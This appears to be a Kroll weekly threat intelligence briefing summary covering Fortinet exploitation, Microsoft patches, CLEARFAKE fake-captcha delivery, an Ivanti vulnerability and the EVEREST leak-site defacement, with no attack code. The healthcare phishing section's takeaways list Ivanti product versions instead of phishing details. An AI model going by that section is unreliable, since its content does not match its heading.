April 14, 2025 Cyber Threat Intelligence Briefing

kroll logo
Kroll
Apr 14, 2025
Kroll

This week’s briefing covers:

00:00 - Intro and Situational Awareness

Fortinet Warns of Active Exploitation of Known Vulnerabilities
Fortinet has identified a post-exploitation technique used by threat actors targeting known, unpatched vulnerabilities in FortiGate devices. The threat actor leveraged a symbolic link trick to maintain read-only access to FortiGate devices, even after the original access vector was remediated.

02:23 [PATCHING] Microsoft Patch Tuesday Addresses 134 Issues, One Zero-Day
Microsoft has fixed 134 vulnerabilities in April’s patch cycle and Microsoft Edge releases.
The patches address:

  • Elevation of privilege vulnerabilities: 49
  • Security feature bypass vulnerabilities: 9
  • Remote code execution vulnerabilities: 31
  • Information disclosure vulnerabilities: 17
  • Denial of service vulnerabilities: 14
  • Spoofing vulnerabilities: 3
  • Edge - Chromium vulnerabilities: 11

05:46 [CAMPAIGN] The Rapid Evolution of CLEARFAKE Delivery
Key Takeaways

  • Kroll continues to observe a rapid evolution in how CLEARFAKE is delivering payloads to victims across all sectors.
  • Clusters of evolved techniques include the use of data/time obfuscation to create filenames as well as variations of MSHTA usage.
  • Despite the evolution, there remains a number of key themes that can assist in detection and mitigation of this threat, including consistent use of PowerShell suspicious commands.
  • User awareness remains a key mitigation, ensuring users remain vigilant for fake captcha popups and understanding the threat from copy/pasting commands into the “run” box.

10:15 [CAMPAIGN] Healthcare targeted with sophisticated phishing campaign
Key Takeaways

  • Pulse Connect Secure 9.1x (End-of-Support)
  • Ivanti Connect Secure ≤ 22.7R2.5
  • Ivanti Policy Secure
  • Neurons for ZTA gateways

13:02 [VULNERABILITY] Critical Remote Code Execution Vulnerability in Multiple Ivanti Products
Ivanti has issued a security update addressing a vulnerability affecting several of its secure access solutions, including Ivanti Connect Secure, Pulse Connect Secure, Policy Secure and Neurons for ZTA gateways.

14:52 [RANSOMWARE] Ransomware Roundup
EVEREST Data Leak Site Defaced
EVEREST ransomware’s data leak site was attacked and vandalized by an unknown threat actor over the weekend. The group’s original victim postings and contents were replaced with the message, “Don’t do crime CRIME IS BAD xoxo from Prague.” At the time of writing, the data leak site has been taken down and does not load.

Dive deeper:

Kroll’s Monthly Threat Intelligence Spotlight Report: https://www.kroll.com/en/insights/publications/cyber/threat-intelligence-reports/cti-spotlight-trends-report

Kroll’s Q3 2024 Threat Landscape Report: https://www.kroll.com/en/insights/publications/cyber/threat-intelligence-reports/q3-2023-threat-landscape-report-social-engineering

Playlist of Kroll's Weekly Cyber Threat Intelligence Briefings: Cyber Threat Intelligence Briefings

Kroll Cyber Blog: https://www.kroll.com/en/insights/publications/cyber

Kroll Cyber Threat Intelligence: https://www.kroll.com/en/services/cyber-risk/managed-security/threat-intelligence-services

Kroll Threat Intelligence Reports: https://www.kroll.com/en/insights/publications/cyber/threat-intelligence-reports

Kroll Responder MDR: https://www.kroll.com/en/services/cyber-risk/managed-security/kroll-responder

#krollcyber #threatintelligence #cyberthreats

Copyright © 2026 OpsMatters™. All rights reserved.